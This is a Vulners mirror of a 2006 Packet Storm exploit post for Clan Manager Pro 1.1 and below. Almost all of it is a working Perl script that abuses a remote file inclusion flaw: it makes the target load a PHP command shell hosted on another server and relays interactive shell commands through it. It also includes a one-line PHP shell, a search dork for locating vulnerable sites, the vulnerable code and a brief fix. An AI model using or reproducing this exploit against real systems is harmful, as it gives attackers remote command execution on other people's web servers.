Vulners
Lucene search
cmpro-1.1.txt
🗓️ 11 Jun 2006 00:00:00Reported by Florian StrankowskiType 
packetstorm🔗 packetstormsecurity.com👁 38 Views
`Hi,
http://sx02.coresec.de/advisories/149.txt
-- cut here --
#!/usr/bin/perl
############
# Clan Manager Pro (CMPRO) <= 1.1
#
# Homepage: www.cmpro.org
# Affected Version: <= 1.1
# Patched Version: /
# Date: 06.06.2006
#
# Application Risk: High
#
# Vendor notified : 06.06.2006
#
#
# Exploit written : Sx02
# http://sx02.coresec.de
#
# usage:# perl cmpro.pl <host> <command shell url> <cmd variable (e.g.:
cmd)>
# perl cmpro.pl http://localhost/path/to/cmpro.extern/
http://localhost/cmd.gif cmd
#
# cmd shell example: <? system($cmd); ?>
# cmd variable: cmd;
#
#
#
# DORK: inurl:"cmpro.ext"
#############
#
# Vulnerable code (cmpro_header.inc.php)
#
# INCLUDE($cm_ext_server.'/config/einstellungen.inc.php');
# INCLUDE($sitepath.'cmpro.ext/global.functions.php');
#
# --------------------------------------------------------
#
# $cmd_ext_server and $sitepath were not declared
# before, so they are vulnerable to remote file
# inclusion.
#
# cmpro_header.inc.php?cm_ext_server=CMD
# cmpro_header.inc.php?sitepath=CMD
#
# --------------------------------------------------------
#
# Solution :
#
# declare variables before including them !
#
# --------------------------------------------------------
#
# "Everything should be made as simple as possible, but not simpler"
# 'Albert Einstein'
#
############
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
head();
while() {
print "[shell] \$";
while(<STDIN>) {
$cmd=$_;
chomp($cmd);
if (!$cmd) {last;}
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET
=>$Path.'cmpro_header.inc.php?cm_ext_server='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or
die "\nCould Not connect\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;
if ($return =~/Error: HTTP request failed!/ ) {
print "\nInvalid path for phpshell\n";
exit;
} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
print "\nInvalid Command, error.\n\n";
}
if ($return =~ /(.*)/) {
$finreturn = $1;
$finreturn=~ tr/[ê]/[\n]/;
print "\r\n$finreturn\n\r";
last;
} else {
print "[shell] \$";
}
}
} last;
sub head() {
print
"\n============================================================================\r\n";
print " CMPro CMS <= 1.1 Remote Command Execution Exploit\r\n";
print " Vulnerable found and Exploit written by Sx02\r\n";
print
"============================================================================\r\n";
}
sub usage() {
head();
print " Usage: perl cmpro.pl <host> <command-url> <cmd>\r\n\n";
print " <host> - Path to CMPro Directory : http://localhost/path/to/cmpro/
\r\n";
print " <command-url> - PhpShell : http://localhost/cmd.gif \r\n";
print " <cmd> - var name used in phpshell : cmd \r\n\r\n";
exit();
}
-- cut here --
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4